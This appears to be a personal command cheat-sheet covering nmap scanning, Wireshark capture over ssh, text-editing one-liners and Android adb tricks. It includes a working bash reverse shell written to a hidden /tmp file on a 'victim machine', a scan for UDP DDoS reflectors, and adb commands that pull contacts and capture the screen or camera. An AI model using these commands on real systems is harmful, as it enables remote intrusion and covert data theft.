hello world.
nmap fun
nmap operating system guess
nmap -O 1.2.3.4
Scan all 65535 ports:
nmap -p- 1.2.3.4
TCP SYN and UDP scan for all ports, without checking ping
nmap -sS -sU -PN -p 1-65535 1.2.3.4
Scan for UDP DDOS reflectors? untested
nmap -sU -A -PN -n -pU:19,53,123,161 -script=ntp-monlist,dns-recursion,snmp-sysdescr 1.2.3.4/24
wireshark trough ssh
ssh 10.0.1.1 "tcpdump -i pppoe-wan -w - 'not port 2'" | wireshark -k -i - <-> wireshark trough ssh with pipe , w big packets
ssh 10.0.1.1 "tcpdump -i pppoe-wan -s0 -w - 'not port 2'" | wireshark -k -i - <-> wireshark trough ssh with pipe , with small packets
Shellsfun
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md - diversity
Tested manual bash reverse shell
First, on your machine, listen.
netcat -nlvp 4444
Then, on victim machine
echo "/bin/sh -i >& /dev/tcp/1.2.3.4/4444 0>&1" > /tmp/.s
bash /tmp/.s
1.2.3.4 = ip of victim. 4444 = port, /tmp/.s = location of bash script
Set password without proper command promt
# echo "linuxpassword" | passwd --stdin linuxuser
on modern Linux.Or.
# echo -e "linuxpassword\nlinuxpassword" | passwd linuxuser
Sed replacement of special characters (and normal)
replaces - with : in text document
sed 's/\-/:/g' oui.txt >> ouioui.txt
fix need root problems from binarys
sed -i 's/geteuid/getppid/' /usr/bin/vlc
replace http// with https://www.mysite.org (any text, including /character)
sed 's+http://+https://www.mysite.org+g' file.txt
replace duplicate lines of text in a file
awk '!seen[$0]++' file.txt
Set download bandwitdth limit of eth2 to 0,5 mb with 32kbit burst and drop all later packets than 400 ms
tc qdisc add dev eth2 root tbf rate 512kbit burst 32kbit latency 400ms
manual ip traffic inspection
ip_conntrack for & ipv4 nf_conntrack for ipv6
cat /proc/net/ip_conntrack
cat /proc/net/nf_conntrack
Android
fun adb commands:
adb shell am start -n com.android.chrome/com.google.android.apps.chrome.Main -d "www.facebook.com"
generic_x86:/ $ pm list packages -f
130|generic_x86:/ $ pm clear com.google.android.youtube
generic_x86:/ $ pm dump com.android.calculator2 | grep -A 1 MAIN
android.intent.action.MAIN:
b91fd0a com.android.calculator2/.Calculator filter 84c5cb
Action: "android.intent.action.MAIN"
Category: "android.intent.category.LAUNCHER"
generic_x86:/ $ am start -n com.android.calculator2/.Calculator
Starting: Intent { cmp=com.android.calculator2/.Calculator }
adb shell "am start -a android.media.action.IMAGE_CAPTURE" && \
sleep 1 && \
adb shell "input keyevent 27"
logcat
take a picture of screen, or video (with audio:) from camera.
adb shell screencap /sdcard/img.png
adb shell screenrecord /sdcard/video.mp4
When done recording, Ctrl+C.
Pull contacts :
adb shell content query --uri content://com.android.contacts/data --projection display_name:data1:data4:contact_id